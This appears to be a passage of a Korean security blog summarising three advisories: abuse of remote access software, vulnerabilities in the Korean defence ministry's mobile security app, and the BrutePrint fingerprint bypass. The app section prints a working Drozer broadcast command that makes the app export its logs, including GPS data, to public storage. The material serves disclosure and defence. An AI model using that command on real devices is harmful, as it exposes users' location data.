③ 공격 준비 시간 감소: 이미 설치된 도구를 사용

- 대응방안
① MFA 적용
② 주기적 암호 변경
③ 관련 도구 사용 모니터링 및 로그 검토
④ 피싱메일, 문서 매크로 등 주의
⑤ 보안 소프트웨어 최신 업데이트 적용, 보안 기능 활성화 등

- 공격자는 초기 액세스, 지속성 유지, 추가 소프트웨어 및 도구 배포, 측면 이동 및 데이터 유출을 위해 원격 액세스 소프트웨어를 사용

> 랜섬웨어 및 특정 APT 그룹에서 자주 사용됨

> PowerShell 등의 명령줄 도구를 사용해 원격 엑세스 소프트웨어 에이전트를 배포하거나 기존에 설치되어 있는 원격 엑세스 소프트웨어 악용

> 원격 엑세스 멀웨어 등의 상용 침투 테스트 도구와 함께 원격 엑세스 소프트웨어를 사용해 여러 형태의 접근을 통해 지속성 유지

- 공격자가 주로 활용할 수 있는 원격 엑세스 소프트웨어는 다음과 같음

3. 권고사항

- 일반적인 표준을 기반으로 위럼 관리 전략 유지

- 현재 사용 중 이거나 사용 가능한 원격 엑세스 소프트웨어의 실행을 제한하는 어플리케이션 제어 구현

- 원격 엑세스 소프트웨어 사용과 관련된 로그 검토

- 네트워크를 분할하여 측면 이동을 최소화

- 원격 엑세스 소프트웨어가 사용하는 포트 및 프로토콜 차단 및 HTTPS 443을 통한 원격 트래픽 차단

- 원격 엑세스 소프트웨어가 업무적으로 필요한 경우 액세스 권한이 있는 모든 계정에 대해 MFA 적용

- 원격 엑세스 소프트웨어 계정의 권한을 최소한으로 설정

4. 참고

[1] https://www.cisa.gov/news-events/alerts/2023/06/06/cisa-and-partners-release-joint-guide-securing-remote-access-software
[2] https://www.cisa.gov/resources-tools/resources/guide-securing-remote-access-software

1. 국방모바일보안

- 국방모바일보안 앱은 국방부에서 개발과 배포를 담당하고 있는 MDM(Mobile Device Management) 애플리케이션

- 모든 병사, 직원 및 외부 출입자들은 보안 상 의무적으로 설치해야 하는 앱으로, 병사용, 직원용, 외부인용 버전이 존재

- 현재 국방부는 군 내부 보안규정에 따라 부대 출입 시 국방모바일보안 앱을 사용하도록 조치

- 군사 기밀 유출을 방지하기 위해 위치 기반 카메라 차단 기능을 제공 (전화, 인터넷 등 기능은 차단되지 않음)

- 군사 시설 내 NFC 기기에 접촉하여 카메라를 비활성화 하며, 위병소에 설치된 비콘을 인식해 활성화

※ 비콘으로 카메라를 활성화하지 못한 경우 앱에 사전 등록된 공공기관 등 주소를 찾아 위치 기반으로 차단 해제 필요

- 시민단체 인터랩에 의해 사용자 개인정보 및 군사정보 유출이 가능한 보안 취약점이 발견

2. 주요내용

2.1 사용자 개인정보 관련 취약점

- 세 가지 버전 모두 GPS 위치정보와 시간, 날짜를 일일 로그 파일에 작성

- 로그 저장 경로: /data/user/0/kr.go.mnd.mmsa/files/MobileSticker/log

- 로그는 사용자가 위치 기반으로 기기 잠금 해제를 시도하는 등의 ActivityCheckOutGPS 액티비티에 관련된 GPS 기능을 사용할 때 작성됨

위험 1. CWE-532: Insertion of Sensitive Information into Log File

- 로그 파일에 저장된 정보는 민감 정보일 수 있으며, 공격자에게 중요한 정보를 제공할 수 있음

> 배포 전 로그 레벨을 적절히 설정하여 민감한 사용자 데이터와 시스템 정보가 노출되지 않도록 하는 것이 중요

- 국방모바일보안 앱의 경우 GPS 정보를 로그에 기록함으로써 위치정보가 노출될 수 있음

위험 2. 위치정보법

- 위치정보법에 근거 위치정보는 개인정보로 취급되며, 위치정보 수집을 위해서는 사용자의 동의를 받아야 함

- 또한, 수집ㆍ이용ㆍ제공 목적을 달성한 때에는 위치정보를 지체없이 파기하여야 함

제2조 (정의)
1. “위치정보”라 함은 이동성이 있는 물건 또는 개인이 특정한 시간에 존재하거나 존재하였던 장소에 관한 정보로서 「전기통신사업법」 제2조제2호 및 제3호에 따른 전기통신설비 및 전기통신회선설비를 이용하여 측위(測位)된 것을 말한다.
2. “개인위치정보”라 함은 특정 개인의 위치정보(위치정보만으로는 특정 개인의 위치를 알 수 없는 경우에도 다른 정보와 용이하게 결합하여 특정 개인의 위치를 알수 있는 것을 포함한다)를 말한다.

제18조(개인위치정보의 수집)
① 위치정보사업자가 개인위치정보를 수집하고자 하는 경우에는 미리 다음 각호의 내용을 이용약관에 명시한 후 개인위치정보주체의 동의를 얻어야 한다.

제23조(개인위치정보의 파기 등) 
① 위치정보사업자등은 개인위치정보의 수집, 이용 또는 제공목적을 달성한 때에는 제16조제2항에 따라 기록ㆍ보존하여야 하는 위치정보 수집ㆍ이용ㆍ제공사실 확인자료 외의 개인위치정보는 즉시 파기하여야 한다. 다만, 다른 법률에 따라 보유하여야 하거나 대통령령으로 정하는 정당한 사유가 있는 경우 개인위치정보를 보유할 수 있다

- 세 가지 버전 모두 플레이스토어 앱 정보에서 "국방모바일보안앱은 사용자의 개인정보 일체를 수집 및 취급하지 않습니다." 명시

> 앱 설치 시에도 개인정보를 수집하지 않는다고 안내하지만, 로그로 기록하며, 위치정보법 제 18조 위반에 해당

- 국방모바일보안 앱에서 위치정보를 기록한 후 미리 저장된 위치정보(앱 작동 범위)와 비교 목적으로만 사용

> 위치 정보 비교 후 더 이상 필요하지 않으므로 파기해야 하지만, 로그로 기록하며, 위치정보법 제 23조 위반에 해당

2.2 데이터베이스 관련 취약점

- 국방모바일보안 앱에는 AegisGate.db 라는 이름의 로컬 SQL 데이터베이스가 포함

> 해당 데이터베이스는 기기의 정보(관리자 전화번호, 기기 정보, 설정 정보)를 기록 및 저장하며, 앱이 특정 기능을 수행할 때 사용됨

위험 1. 불필요 데이터 저장

- 외부인 버전에서 사용자로부터 AdminTelephone 번호를 입력 받아 AdminTellInfo 테이블에 기록

- 직원 버전에서 수/발신 전화번호가 ConfigInfo 테이블에 기록

- 해당 데이터를 앱에서 사용되지 않지만 기록되어 외부에 노출되어 악용될 가능성 존재

위험 2. 미흡한 암호화

- 데이터베이스에 포함된 모든 값들은 AES/CBC/PKCS5Padding 으로 암호화되고 base64 로 인코딩

> 그 중 AES 키는 타임스탬프를 기반으로 하여 생성되는데, 타임스탬프는 SHA256 인코딩을 거쳐 생성된 32 바이트 값

> 전화번호는 타임스탬프 기반 키와 앱에서 생성된 IV 값을 이용해 암호화를 거친 뒤 base64 로 인코딩되어 저장

- [사진 3]의 메소드에서 타임스탬프 기반으로 생성된 키가 AgentK 테이블에 저장됨 

> 공격자가 데이터베이스와 IV에 접근할 수 있을 경우 데이터베이스에 저장된 데이터를 복호화 할 수 있게 됨

2.3 위치 정보  관련 취약점

- 국방모바일보안 앱의 전반적인 보안은 좋은 편

> 공격자가 기기에 접근할 수 있을 때 개인정보 유출을 초래하는 취약점 발견

> 해당 취약점은 국방모바일보안(외부인) 2.1.17, 국방모바일보안(직원) 2.1.25 버전에 존재

- 두 버전에는 "BroadcastReceiverExternal"이라는 브로드캐스트 리시버가 존재

- 권한이 설정되어 있지않아 누구나 리시버를 내보낼 수 있음

※ 브로드캐스트 리시버: 안드로이드는 기기의 상태 변화 이벤트(충전, 비행기 모드 설정 등)가 발생한 경우 인텐트로 감싸진 Broadcast 신호를 보내는데, 해당 신호를 받아 인텐트 필터를 통해 구분 후 관련된 기능에 전달해 주는 역할을 수행

- 브로드캐스트 리시버는 “com.markany.aegis.AEGIS_ACTION_ADMIN_REQUEST” 인텐트 필터를 가짐

> 해당 인텐트가 포함된 브로드캐스 수신 시 문자열 값 “action_admin”과 “action_admin_exportLog”이 포함되는지 확인

> 두 문자열이 포함된 경우 앱이 기록한 모든 로그를 /storage/emulated/0/Aegis/ 경로로 추출

- Drozer에서 다음의 명령을 수행할 경우 누구나 접근 가능한 저장소 디렉토리에 로그 추출이 가능함

※ Drozer: 모바일 앱 취약점 진단 프레임워크로 안드로이드 시스템에 접근하여 앱을 동적으로 진단할 수 있는 도구이며, 서버-클라이언트로 동작

run app.broadcast.send --action com.markany.aegis.AEGIS_ACTION_ADMIN_REQUEST --component kr.go.mnd.mmsa.of kr.go.mnd.mmsa.of.br.BroadcastReceiverExternal --extra string action_admin action_admin_exportLog

- 이 경우, 사용자에게 알림이 발생하며, 추출된 로그를 통해 대략적인 GPS 위치 정보 등을 확인 가능

※ 앱에서 직접 로그를 추출은 관리자 권한이 없어 불가능

- 국방부는 해당 취약점에 대해 다음과 같은 입장을 발표

> 인터랩 제보 통해 해당 취약점 확인 및 개발업체와 협조해 보완 조치중

> 국방모바일보안 앱은 사용자 데이터를 수집하지 않으며, GPS 기록은 개인 휴대전화 내부에 로그로만 저장될 뿐 유출 위험은 없음

> 개발업체와 협조하여 앱 로그에 GPS 정보가 포함되지 않도록 보완할 예정

> GPS 정보는 부대 외부에서 국방모바일보안 앱 해제를 위해 이용될 뿐 부대 위치 정보는 포함되지 않음

> 국방모바일보안 앱은 사용자 등록 및 로그인 기능이 없어 개인정보 보관 등의 우려는 없음

3. 참고

[1] https://interlab.or.kr/archives/19268
[2] https://www.boannews.com/media/view.asp?idx=118437&page=1&kind=1

1. 개요

- 텐센트와 저장대학교 연구진이 스마트폰 지문 인식을 우회할 수 있는 'BrutePrint'(브루트프린트)라는 시스템을 개발

- BrutePrint는 약15달러(약 2만)으로 제작 가능하며, 지문 인증을 무제한으로 시도해 지문 인증을 우회할 수 있음

- 방대한 지문 정보를 가진 장치를 스마트폰에 부착해 지문을 스캔하는 것으로 인식하도록 센서를 속이는 방법으로 작동

- 해당 기법을 적용하려면 대상 스마트폰에 물리적인 접근이 가능해야 함

2. 주요 내용

2.1 일반적인 지문 인식 방법

- 스마트폰 지문 인증 프로세스는 ① 획득 > ② 보정 > ③ 위조 방지 > ④ 매칭 단계로 구성

① 획득: 지문 감지

② 보정: 입력된 지문 화질 향상 및 원본 지문 화질 조정

> 데이터베이스에 저장된 원본 지문은 깨끗한 상태로 저장된 반면, 입력된 지문은 흐릿한 상태로 입력되기 때문

③ 위조 방지: 두 지문의 유사도 측정

④ 매칭: 잠금 해제

- 일반적으로 스마트폰 지문 인증 시스템은 횟수 제한 초과 시 잠금 등을 이용해 보안성을 향상

2.2 방법론

- 3가지 취약점을 이용

① CAMF(Cancel-After-Match-Fail): 특정 오류 신호가 수신될 경우 실패 시도를 초기화하는데, 해당 오류 신호를 주입하여 시도 제한 우회 

② MAL(Match-After-Lock): 잠금 모드에서 공격자가 지문 이미지의 인증 결과를 유추할 수 있는 취약점

③ SPI(Serial Peripheral Interface)의 데이터 평문 전송으로 인한 MITM 취약점

※ SPI(Serial Peripheral Interface): 지문 센서와 스마트폰 프로세서 간의 동기 직렬 통신에 사용

- 연구에 사용된 지문 정보의 수집은 학술적 목적의 지문 데이터베이스와 유출된 지문 정보를 이용

2.3 디바이스

- 지문 이미지 저장용 메모리 SD 플래시, 컨트롤러 STM32F412, 스위치 RS2117, B2B 커넥터로 구성되었으며, 부품의 합계는 약 15달러(약 2만원)

- 디바이스는 운영보드와 공격보드로 구성되어 있어, 스마트폰 지문 인증 센서에 오인식시키는 것이 가능함

- 저장된 지문 데이터를 수집하고, 수집된 데이터와 저장된 지문 데이터베이스를 사용해 지문 사전을 생성해 공격 수행

- 스마트폰 기종별로 적용된 지문 판독 유형은 정전식, 광학식, 초박형, 초음파식 등 다양

> 대상의 판독 유형에 맞춰 가공한 이미지를 전송할 수 있도록 설계

2.4 결과

- Apple iPhone SE와 Apple iPhone 7 제외한 나머지 스마트폰에서 지문 인증을 무제한으로 실행해 우회하는데 성공

- 또한, 스마트폰 소유자에 대한 사전 지식이 없는 상태에서도 최단 40분 만에 우회에 성공

2.5 완화 방안

- CAMF 관련 검증을 추가하여 모니터링 - Ex) 임계값

> 오류로 인한 초기화 여부 확인 및 발생 횟수를 카운트하여 임계값 도달 시 보안 수준 강화

- 스마트폰 제조 벤더사의 중요 데이터 암호화 책임 강화

3. 추가 대응 방안

- 등록 지문 개수 최소화

> 갤럭시의 경우 최대 4개의 다른 지문을 추가할 수 있음

> 다수의 지문이 등록된 경우 다른 공격 유형에 노출될 위험 증가

- PIN 등 암호 추가 적용

4. 참고